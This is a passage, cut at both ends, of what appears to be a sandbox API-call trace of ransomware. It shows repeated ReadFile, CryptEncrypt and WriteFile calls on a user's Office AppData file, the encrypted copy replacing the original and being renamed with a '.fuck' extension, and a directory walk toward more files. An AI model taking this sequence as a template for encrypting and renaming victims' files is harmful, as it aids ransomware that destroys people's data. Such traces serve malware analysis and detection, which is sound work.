nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.600] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.600] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.601] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.601] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.601] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.601] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.601] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.601] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.601] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.601] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.602] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.602] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.602] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.602] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.602] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.602] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.603] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.603] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.604] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.604] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.604] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.604] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.604] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.604] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.605] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.605] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.605] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.605] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.605] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.605] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.605] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.606] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.606] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.607] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.607] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.607] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.607] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\visio.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\visio.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.615] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.616] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\visio.exe_rules.xml.gsg")) returned 1 [0269.618] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\visio.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\visio.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\visio.exe_rules.xml.fuck")) returned 1 [0269.620] CryptDestroyHash (hHash=0x2fa548) returned 1 [0269.620] CryptDestroyKey (hKey=0x2fa888) returned 1 [0269.620] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.620] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.620] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa908 [0269.620] FindNextFileA (in: hFindFile=0x2fa908, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0269.620] FindNextFileA (in: hFindFile=0x2fa908, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0269.620] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x2fa1c8 [0269.622] FindNextFileA (in: hFindFile=0x2fa1c8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0269.622] FindNextFileA (in: hFindFile=0x2fa1c8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0269.622] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\WebServiceCache\\AllUsers\\cdn.odc.officeapps.live.com\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2fa308 [0269.634] FindNextFileA (in: hFindFile=0x2fa308, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.634] FindNextFileA (in: hFindFile=0x2fa308, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0269.634] FindNextFileA (in: hFindFile=0x2fa308, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0269.634] FindClose (in: hFindFile=0x2fa308 | out: hFindFile=0x2fa308) returned 1 [0269.635] GetFileAttributesA 